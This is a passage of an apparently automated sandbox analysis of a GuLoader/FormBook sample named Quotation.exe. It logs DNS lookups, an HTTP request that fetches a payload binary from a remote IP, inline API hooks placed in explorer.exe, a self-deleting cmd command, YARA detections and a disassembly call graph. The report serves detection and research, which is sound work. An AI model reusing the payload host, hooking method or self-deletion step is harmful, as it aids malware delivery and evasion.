                                                            Nov 12, 2024 07:35:48.384711027 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:48.406569004 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.406594038 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.406606913 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:48.406660080 CET804983694.141.120.137192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 12, 2024 07:36:28.285089016 CET | 56233 | 53 | 192.168.2.5 | 1.1.1.1
Nov 12, 2024 07:36:28.307101965 CET | 53 | 56233 | 1.1.1.1 | 192.168.2.5
Nov 12, 2024 07:36:49.206396103 CET | 54376 | 53 | 192.168.2.5 | 1.1.1.1
Nov 12, 2024 07:36:49.235395908 CET | 53 | 54376 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 12, 2024 07:36:28.285089016 CET | 192.168.2.5 | 1.1.1.1 | 0xba0c | Standard query (0) | www.rbis.site | A (IP address) | IN (0x0001) | false
Nov 12, 2024 07:36:49.206396103 CET | 192.168.2.5 | 1.1.1.1 | 0xecc3 | Standard query (0) | www.alkak.cam | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 12, 2024 07:36:28.307101965 CET | 1.1.1.1 | 192.168.2.5 | 0xba0c | Name error (3) | www.rbis.site | none | none | A (IP address) | IN (0x0001) | false
Nov 12, 2024 07:36:49.235395908 CET | 1.1.1.1 | 192.168.2.5 | 0xecc3 | Name error (3) | www.alkak.cam | none | none | A (IP address) | IN (0x0001) | false
• 94.141.120.137

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49836 | 94.141.120.137 | 80 | 3288 | C:\Users\user\Desktop\Quotation.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 07:35:46.498218060 CET | 177 | OUT | GET /qVMezflLJCc194.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: 94.141.120.137
    Cache-Control: no-cache
Nov 12, 2024 07:35:47.375026941 CET | 1236 | IN | HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Last-Modified: Tue, 12 Nov 2024 01:47:07 GMT
    Accept-Ranges: bytes
    ETag: "7d8f7c7a434db1:0"
    Server: Microsoft-IIS/8.5
    Date: Tue, 12 Nov 2024 06:35:47 GMT
    Content-Length: 189504


Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xEA
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xEA
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xEA
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xEA


Target ID: 0
Start time: 01:34:56
Start date: 12/11/2024
Path: C:\Users\user\Desktop\Quotation.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Quotation.exe"
Imagebase: 0x400000
File size: 690'000 bytes
MD5 hash: 0A4E34CCC6E3E118F225A4F38F731A14
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2396223937.0000000006CC9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 3
Start time: 01:35:36
Start date: 12/11/2024
Path: C:\Users\user\Desktop\Quotation.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Quotation.exe"
Imagebase: 0x400000
File size: 690'000 bytes
MD5 hash: 0A4E34CCC6E3E118F225A4F38F731A14
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2567406164.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2614406463.0000000033AC0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low
Has exited: true

Target ID: 5
Start time: 01:35:49
Start date: 12/11/2024
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff674740000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 6
Start time: 01:35:50
Start date: 12/11/2024
Path: C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\colorcpl.exe"
Imagebase: 0xbc0000
File size: 86'528 bytes
MD5 hash: DB71E132EBF1FEB6E93E8A2A0F0C903D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.3257817647.0000000003080000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.3257861968.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.3257499889.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate
Has exited: false

Target ID: 7
Start time: 01:35:55
Start date: 12/11/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del "C:\Users\user\Desktop\Quotation.exe"
Imagebase: 0x790000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 01:35:55
Start date: 12/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 20.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 17.6%
Total number of Nodes: 1604
Total number of Limit Nodes: 44
4634->4638 4736 73422618 4634->4736 4636 73421896 4636->4633 4637 73422655 10 API calls 4637->4634 4638->4609 4642 7342196f GlobalFree 4638->4642 4642->4609 4644 73421951 4644->4638 4740 734215dd wsprintfW 4644->4740 4645 7342194a FreeLibrary 4645->4644 4647->4602 4743 734212bb GlobalAlloc 4648->4743 4650 73421c26 4744 734212bb GlobalAlloc 4650->4744 4652 73421e6b GlobalFree GlobalFree GlobalFree 4654 73421e88 4652->4654 4659 73421ed2 4652->4659 4653 73421c31 4653->4652 4657 73421d26 GlobalAlloc 4653->4657 4653->4659 4660 73421d8f GlobalFree 4653->4660 4663 73421d71 lstrcpyW 4653->4663 4664 73421d7b lstrcpyW 4653->4664 4667 73422126 4653->4667 4673 73422067 GlobalFree 4653->4673 4674 734221ae 4653->4674 4675 734212cc 2 API calls 4653->4675 4676 73421dcd 4653->4676 4655 7342227e 4654->4655 4656 73421e9d 4654->4656 4654->4659 4658 734222a0 GetModuleHandleW 4655->4658 4655->4659 4656->4659 4747 734212cc 4656->4747 4657->4653 4661 734222b1 LoadLibraryW 4658->4661 4662 734222c6 4658->4662 4659->4608 4660->4653 4661->4659 4661->4662 4751 734216bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4662->4751 4663->4664 4664->4653 4666 73422318 4666->4659 4670 73422325 lstrlenW 4666->4670 4750 734212bb GlobalAlloc 4667->4750 4752 734216bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4670->4752 4671 734222d8 4671->4666 4680 73422302 GetProcAddress 4671->4680 4673->4653 4674->4659 4679 73422216 lstrcpyW 4674->4679 4675->4653 4676->4653 4745 7342162f GlobalSize GlobalAlloc 4676->4745 4677 7342233f 4677->4659 4679->4659 4680->4666 4681 7342212f 4681->4608 4689 73422498 4682->4689 4684 734225c1 GlobalFree 4687 7342186f 4684->4687 4684->4689 4685 73422540 GlobalAlloc WideCharToMultiByte 4685->4684 4686 7342256b GlobalAlloc CLSIDFromString 4686->4684 4687->4618 4687->4619 4687->4633 4688 734212cc GlobalAlloc lstrcpynW 4688->4689 4689->4684 4689->4685 4689->4686 4689->4688 4691 7342258a 4689->4691 4754 7342135a 4689->4754 
4691->4684 4758 734227a4 4691->4758 4694 73422baa 4692->4694 4693 73422c4f EnumWindows 4697 73422c6d 4693->4697 4694->4693 4696 73422d39 4696->4633 4761 73422b42 4697->4761 4699 73422453 4698->4699 4700 73421868 4699->4700 4701 7342245e GlobalAlloc 4699->4701 4700->4611 4701->4699 4706 73422840 4702->4706 4703 734228db GlobalAlloc 4707 734228fe 4703->4707 4704 734228ee 4705 734228f4 GlobalSize 4704->4705 4704->4707 4705->4707 4706->4703 4706->4704 4707->4636 4709 73422e2e 4708->4709 4710 73422e6e GlobalFree 4709->4710 4765 734212bb GlobalAlloc 4711->4765 4713 734226fa StringFromGUID2 4718 7342265f 4713->4718 4714 7342270b lstrcpynW 4714->4718 4715 734226d8 MultiByteToWideChar 4715->4718 4716 73422742 GlobalFree 4716->4718 4717 7342271e wsprintfW 4717->4718 4718->4713 4718->4714 4718->4715 4718->4716 4718->4717 4719 73422777 GlobalFree 4718->4719 4720 73421312 2 API calls 4718->4720 4766 73421381 4718->4766 4719->4625 4720->4718 4770 734212bb GlobalAlloc 4722->4770 4724 73421659 4725 73421666 2 API calls 4724->4725 4726 73421663 4725->4726 4727 73421312 4726->4727 4728 73421355 GlobalFree 4727->4728 4729 7342131b GlobalAlloc lstrcpynW 4727->4729 4728->4634 4729->4728 4731 73421672 wsprintfW 4730->4731 4732 7342169f lstrcpyW 4730->4732 4735 734216b8 4731->4735 4732->4735 4735->4637 4737 73422626 4736->4737 4738 73421931 4736->4738 4737->4738 4739 73422642 GlobalFree 4737->4739 4738->4644 4738->4645 4739->4737 4741 73421312 2 API calls 4740->4741 4742 734215fe 4741->4742 4742->4638 4743->4650 4744->4653 4746 7342164d 4745->4746 4746->4676 4753 734212bb GlobalAlloc 4747->4753 4749 734212db lstrcpynW 4749->4659 4750->4681 4751->4671 4752->4677 4753->4749 4755 73421361 4754->4755 4756 734212cc 2 API calls 4755->4756 4757 7342137f 4756->4757 4757->4689 4759 734227b2 VirtualAlloc 4758->4759 4760 73422808 4758->4760 4759->4760 4760->4691 4762 73422b4d 4761->4762 4763 73422b52 GetLastError 4762->4763 4764 73422b5d 4762->4764 4763->4764 4764->4696 4765->4718 4767 7342138a 
4766->4767 4768 734213ac 4766->4768 4767->4768 4769 73421390 lstrcpyW 4767->4769 4768->4718 4769->4768 4770->4724 5472 402b5e 5473 402bb0 5472->5473 5474 402b65 5472->5474 5475 406915 5 API calls 5473->5475 5476 402d89 21 API calls 5474->5476 5479 402bae 5474->5479 5477 402bb7 5475->5477 5478 402b73 5476->5478 5480 402dab 21 API calls 5477->5480 5481 402d89 21 API calls 5478->5481 5482 402bc0 5480->5482 5485 402b7f 5481->5485 5482->5479 5483 402bc4 IIDFromString 5482->5483 5483->5479 5484 402bd3 5483->5484 5484->5479 5490 406521 lstrcpynW 5484->5490 5489 406468 wsprintfW 5485->5489 5487 402bf0 CoTaskMemFree 5487->5479 5489->5479 5490->5487 5498 40465f 5499 404791 5498->5499 5500 404677 5498->5500 5501 4047fb 5499->5501 5502 4048c5 5499->5502 5509 4047cc GetDlgItem SendMessageW 5499->5509 5504 4044a0 22 API calls 5500->5504 5501->5502 5503 404805 GetDlgItem 5501->5503 5506 404507 8 API calls 5502->5506 5507 40481f 5503->5507 5508 404886 5503->5508 5505 4046de 5504->5505 5511 4044a0 22 API calls 5505->5511 5512 4048c0 5506->5512 5507->5508 5513 404845 SendMessageW LoadCursorW SetCursor 5507->5513 5508->5502 5514 404898 5508->5514 5531 4044c2 KiUserCallbackDispatcher 5509->5531 5516 4046eb CheckDlgButton 5511->5516 5535 40490e 5513->5535 5518 4048ae 5514->5518 5519 40489e SendMessageW 5514->5519 5515 4047f6 5532 4048ea 5515->5532 5529 4044c2 KiUserCallbackDispatcher 5516->5529 5518->5512 5523 4048b4 SendMessageW 5518->5523 5519->5518 5523->5512 5524 404709 GetDlgItem 5530 4044d5 SendMessageW 5524->5530 5526 40471f SendMessageW 5527 404745 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5526->5527 5528 40473c GetSysColor 5526->5528 5527->5512 5528->5527 5529->5524 5530->5526 5531->5515 5533 4048f8 5532->5533 5534 4048fd SendMessageW 5532->5534 5533->5534 5534->5501 5538 405b47 ShellExecuteExW 5535->5538 5537 404874 LoadCursorW SetCursor 5537->5508 5538->5537 5539 402a60 5540 402d89 21 API calls 5539->5540 5541 402a66 5540->5541 5542 402aa9 5541->5542 5543 
402a8d 5541->5543 5550 402933 5541->5550 5544 402ac3 5542->5544 5545 402ab3 5542->5545 5546 402a92 5543->5546 5547 402aa3 5543->5547 5549 40655e 21 API calls 5544->5549 5548 402d89 21 API calls 5545->5548 5553 406521 lstrcpynW 5546->5553 5554 406468 wsprintfW 5547->5554 5548->5550 5549->5550 5553->5550 5554->5550 4798 401761 4799 402dab 21 API calls 4798->4799 4800 401768 4799->4800 4804 406040 4800->4804 4802 40176f 4803 406040 2 API calls 4802->4803 4803->4802 4805 40604d GetTickCount GetTempFileNameW 4804->4805 4806 406087 4805->4806 4807 406083 4805->4807 4806->4802 4807->4805 4807->4806 5555 401d62 5556 402d89 21 API calls 5555->5556 5557 401d73 SetWindowLongW 5556->5557 5558 402c2f 5557->5558 4917 401ee3 4918 402d89 21 API calls 4917->4918 4919 401ee9 4918->4919 4920 402d89 21 API calls 4919->4920 4921 401ef5 4920->4921 4922 401f01 ShowWindow 4921->4922 4923 401f0c EnableWindow 4921->4923 4924 402c2f 4922->4924 4923->4924 5559 4028e3 5560 4028eb 5559->5560 5561 4028ef FindNextFileW 5560->5561 5563 402901 5560->5563 5562 402948 5561->5562 5561->5563 5565 406521 lstrcpynW 5562->5565 5565->5563 5566 734210e1 5575 73421111 5566->5575 5567 734212b0 GlobalFree 5568 734211d7 GlobalAlloc 5568->5575 5569 73421240 GlobalFree 5569->5575 5570 7342135a 2 API calls 5570->5575 5571 734212ab 5571->5567 5572 73421312 2 API calls 5572->5575 5573 7342129a GlobalFree 5573->5575 5574 73421381 lstrcpyW 5574->5575 5575->5567 5575->5568 5575->5569 5575->5570 5575->5571 5575->5572 5575->5573 5575->5574 5576 7342116b GlobalAlloc 5575->5576 5576->5575 4925 4056e5 4926 405706 GetDlgItem GetDlgItem GetDlgItem 4925->4926 4927 40588f 4925->4927 4971 4044d5 SendMessageW 4926->4971 4929 4058c0 4927->4929 4930 405898 GetDlgItem CreateThread CloseHandle 4927->4930 4932 4058eb 4929->4932 4933 405910 4929->4933 4934 4058d7 ShowWindow ShowWindow 4929->4934 4930->4929 4974 405679 OleInitialize 4930->4974 4931 405776 4941 40577d GetClientRect GetSystemMetrics SendMessageW SendMessageW 4931->4941 
4935 4058f7 4932->4935 4936 40594b 4932->4936 4940 404507 8 API calls 4933->4940 4973 4044d5 SendMessageW 4934->4973 4938 405925 ShowWindow 4935->4938 4939 4058ff 4935->4939 4936->4933 4942 405959 SendMessageW 4936->4942 4945 405945 4938->4945 4946 405937 4938->4946 4943 404479 SendMessageW 4939->4943 4944 40591e 4940->4944 4947 4057eb 4941->4947 4948 4057cf SendMessageW SendMessageW 4941->4948 4942->4944 4949 405972 CreatePopupMenu 4942->4949 4943->4933 4953 404479 SendMessageW 4945->4953 4952 4055a6 28 API calls 4946->4952 4950 4057f0 SendMessageW 4947->4950 4951 4057fe 4947->4951 4948->4947 4954 40655e 21 API calls 4949->4954 4950->4951 4955 4044a0 22 API calls 4951->4955 4952->4945 4953->4936 4956 405982 AppendMenuW 4954->4956 4957 40580e 4955->4957 4958 4059b2 TrackPopupMenu 4956->4958 4959 40599f GetWindowRect 4956->4959 4960 405817 ShowWindow 4957->4960 4961 40584b GetDlgItem SendMessageW 4957->4961 4958->4944 4962 4059cd 4958->4962 4959->4958 4963 40583a 4960->4963 4964 40582d ShowWindow 4960->4964 4961->4944 4965 405872 SendMessageW SendMessageW 4961->4965 4966 4059e9 SendMessageW 4962->4966 4972 4044d5 SendMessageW 4963->4972 4964->4963 4965->4944 4966->4966 4967 405a06 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4966->4967 4969 405a2b SendMessageW 4967->4969 4969->4969 4970 405a54 GlobalUnlock SetClipboardData CloseClipboard 4969->4970 4970->4944 4971->4931 4972->4961 4973->4932 4975 4044ec SendMessageW 4974->4975 4979 40569c 4975->4979 4976 4056c3 4977 4044ec SendMessageW 4976->4977 4978 4056d5 OleUninitialize 4977->4978 4979->4976 4980 401389 2 API calls 4979->4980 4980->4979 5577 404ce7 5578 404d13 5577->5578 5579 404cf7 5577->5579 5580 404d46 5578->5580 5581 404d19 SHGetPathFromIDListW 5578->5581 5588 405b65 GetDlgItemTextW 5579->5588 5583 404d30 SendMessageW 5581->5583 5584 404d29 5581->5584 5583->5580 5586 40140b 2 API calls 5584->5586 5585 404d04 SendMessageW 5585->5578 5586->5583 5588->5585 5589 401568 5590 402ba9 5589->5590 5593 406468 
wsprintfW 5590->5593 5592 402bae 5593->5592 5594 734223e9 5595 73422453 5594->5595 5596 7342247d 5595->5596 5597 7342245e GlobalAlloc 5595->5597 5597->5595 5598 40196d 5599 402d89 21 API calls 5598->5599 5600 401974 5599->5600 5601 402d89 21 API calls 5600->5601 5602 401981 5601->5602 5603 402dab 21 API calls 5602->5603 5604 401998 lstrlenW 5603->5604 5605 4019a9 5604->5605 5608 4019ea 5605->5608 5610 406521 lstrcpynW 5605->5610 5607 4019da 5607->5608 5609 4019df lstrlenW 5607->5609 5609->5608 5610->5607 5611 40166f 5612 402dab 21 API calls 5611->5612 5613 401675 5612->5613 5614 40687e 2 API calls 5613->5614 5615 40167b 5614->5615 5616 402af0 5617 402d89 21 API calls 5616->5617 5618 402af6 5617->5618 5619 40655e 21 API calls 5618->5619 5620 402933 5618->5620 5619->5620 5001 4026f1 5002 402d89 21 API calls 5001->5002 5011 402700 5002->5011 5003 40283d 5004 40274a ReadFile 5004->5003 5004->5011 5005 4027e3 5005->5003 5005->5011 5015 4060f2 SetFilePointer 5005->5015 5006 406094 ReadFile 5006->5011 5008 40278a MultiByteToWideChar 5008->5011 5009 40283f 5024 406468 wsprintfW 5009->5024 5011->5003 5011->5004 5011->5005 5011->5006 5011->5008 5011->5009 5012 4027b0 SetFilePointer MultiByteToWideChar 5011->5012 5013 402850 5011->5013 5012->5011 5013->5003 5014 402871 SetFilePointer 5013->5014 5014->5003 5016 40610e 5015->5016 5023 406126 5015->5023 5017 406094 ReadFile 5016->5017 5018 40611a 5017->5018 5019 406157 SetFilePointer 5018->5019 5020 40612f SetFilePointer 5018->5020 5018->5023 5019->5023 5020->5019 5021 40613a 5020->5021 5022 4060c3 WriteFile 5021->5022 5022->5023 5023->5005 5024->5003 5025 401774 5026 402dab 21 API calls 5025->5026 5027 40177b 5026->5027 5028 4017a3 5027->5028 5029 40179b 5027->5029 5066 406521 lstrcpynW 5028->5066 5065 406521 lstrcpynW 5029->5065 5032 4017a1 5036 4067cf 5 API calls 5032->5036 5033 4017ae 5034 405df0 3 API calls 5033->5034 5035 4017b4 lstrcatW 5034->5035 5035->5032 5043 4017c0 5036->5043 5037 4017fc 5039 405fec 2 API calls 
5037->5039 5038 40687e 2 API calls 5038->5043 5039->5043 5041 4017d2 CompareFileTime 5041->5043 5042 401892 5044 4055a6 28 API calls 5042->5044 5043->5037 5043->5038 5043->5041 5043->5042 5051 40655e 21 API calls 5043->5051 5056 406521 lstrcpynW 5043->5056 5059 405b81 MessageBoxIndirectW 5043->5059 5062 401869 5043->5062 5064 406011 GetFileAttributesW CreateFileW 5043->5064 5046 40189c 5044->5046 5045 4055a6 28 API calls 5053 40187e 5045->5053 5047 4032b9 39 API calls 5046->5047 5048 4018af 5047->5048 5049 4018c3 SetFileTime 5048->5049 5050 4018d5 CloseHandle 5048->5050 5049->5050 5052 4018e6 5050->5052 5050->5053 5051->5043 5054 4018eb 5052->5054 5055 4018fe 5052->5055 5057 40655e 21 API calls 5054->5057 5058 40655e 21 API calls 5055->5058 5056->5043 5060 4018f3 lstrcatW 5057->5060 5061 401906 5058->5061 5059->5043 5060->5061 5061->5053 5063 405b81 MessageBoxIndirectW 5061->5063 5062->5045 5062->5053 5063->5053 5064->5043 5065->5032 5066->5033 5635 4014f5 SetForegroundWindow 5636 402c2f 5635->5636 5637 73421774 5638 734217a3 5637->5638 5639 73421bff 22 API calls 5638->5639 5640 734217aa 5639->5640 5641 734217b1 5640->5641 5642 734217bd 5640->5642 5643 73421312 2 API calls 5641->5643 5644 734217c7 5642->5644 5645 734217e4 5642->5645 5646 734217bb 5643->5646 5647 734215dd 3 API calls 5644->5647 5648 734217ea 5645->5648 5649 7342180e 5645->5649 5651 734217cc 5647->5651 5652 73421654 3 API calls 5648->5652 5650 734215dd 3 API calls 5649->5650 5650->5646 5654 73421654 3 API calls 5651->5654 5653 734217ef 5652->5653 5655 73421312 2 API calls 5653->5655 5656 734217d2 5654->5656 5657 734217f5 GlobalFree 5655->5657 5658 73421312 2 API calls 5656->5658 5657->5646 5659 73421809 GlobalFree 5657->5659 5660 734217d8 GlobalFree 5658->5660 5659->5646 5660->5646 5661 401a77 5662 402d89 21 API calls 5661->5662 5663 401a80 5662->5663 5664 402d89 21 API calls 5663->5664 5665 401a25 5664->5665 5666 401578 5667 401591 5666->5667 5668 401588 ShowWindow 5666->5668 5669 402c2f 5667->5669 
5670 40159f ShowWindow 5667->5670 5668->5667 5670->5669 5113 4023f9 5114 402dab 21 API calls 5113->5114 5115 402408 5114->5115 5116 402dab 21 API calls 5115->5116 5117 402411 5116->5117 5118 402dab 21 API calls 5117->5118 5119 40241b GetPrivateProfileStringW 5118->5119 5671 73421979 5672 7342199c 5671->5672 5673 734219d1 GlobalFree 5672->5673 5674 734219e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5672->5674 5673->5674 5675 73421312 2 API calls 5674->5675 5676 73421b6e GlobalFree GlobalFree 5675->5676 5677 401ffb 5678 402dab 21 API calls 5677->5678 5679 402002 5678->5679 5680 40687e 2 API calls 5679->5680 5681 402008 5680->5681 5683 402019 5681->5683 5684 406468 wsprintfW 5681->5684 5684->5683 5124 4034fc SetErrorMode GetVersionExW 5125 403550 GetVersionExW 5124->5125 5126 403588 5124->5126 5125->5126 5127 4035df 5126->5127 5128 406915 5 API calls 5126->5128 5129 4068a5 3 API calls 5127->5129 5128->5127 5130 4035f5 lstrlenA 5129->5130 5130->5127 5131 403605 5130->5131 5132 406915 5 API calls 5131->5132 5133 40360c 5132->5133 5134 406915 5 API calls 5133->5134 5135 403613 5134->5135 5136 406915 5 API calls 5135->5136 5137 40361f #17 OleInitialize SHGetFileInfoW 5136->5137 5212 406521 lstrcpynW 5137->5212 5140 40366e GetCommandLineW 5213 406521 lstrcpynW 5140->5213 5142 403680 5143 405e1d CharNextW 5142->5143 5144 4036a6 CharNextW 5143->5144 5152 4036b8 5144->5152 5145 4037ba 5146 4037ce GetTempPathW 5145->5146 5214 4034cb 5146->5214 5148 4037e6 5149 403840 DeleteFileW 5148->5149 5150 4037ea GetWindowsDirectoryW lstrcatW 5148->5150 5224 403082 GetTickCount GetModuleFileNameW 5149->5224 5153 4034cb 12 API calls 5150->5153 5151 405e1d CharNextW 5151->5152 5152->5145 5152->5151 5158 4037bc 5152->5158 5155 403806 5153->5155 5155->5149 5157 40380a GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 5155->5157 5156 403854 5164 405e1d CharNextW 5156->5164 5195 4038fb 5156->5195 5203 40390b 5156->5203 5159 4034cb 12 API calls 5157->5159 5308 
406521 lstrcpynW 5158->5308 5162 403838 5159->5162 5162->5149 5162->5203 5168 403873 5164->5168 5166 403a59 5169 405b81 MessageBoxIndirectW 5166->5169 5167 403a7d 5170 403b01 ExitProcess 5167->5170 5171 403a85 GetCurrentProcess OpenProcessToken 5167->5171 5172 4038d1 5168->5172 5173 403914 5168->5173 5175 403a67 ExitProcess 5169->5175 5176 403ad1 5171->5176 5177 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 5171->5177 5179 405ef8 18 API calls 5172->5179 5180 405aec 5 API calls 5173->5180 5178 406915 5 API calls 5176->5178 5177->5176 5182 403ad8 5178->5182 5183 4038dd 5179->5183 5181 403919 lstrlenW 5180->5181 5311 406521 lstrcpynW 5181->5311 5185 403aed ExitWindowsEx 5182->5185 5187 403afa 5182->5187 5183->5203 5309 406521 lstrcpynW 5183->5309 5185->5170 5185->5187 5186 403933 5189 40394b 5186->5189 5312 406521 lstrcpynW 5186->5312 5190 40140b 2 API calls 5187->5190 5194 403971 wsprintfW 5189->5194 5209 40399d 5189->5209 5190->5170 5191 4038f0 5310 406521 lstrcpynW 5191->5310 5196 40655e 21 API calls 5194->5196 5252 403bf3 5195->5252 5196->5189 5197 405a75 2 API calls 5197->5209 5198 405acf 2 API calls 5198->5209 5199 4039e7 SetCurrentDirectoryW 5202 4062e1 40 API calls 5199->5202 5200 4039ad GetFileAttributesW 5201 4039b9 DeleteFileW 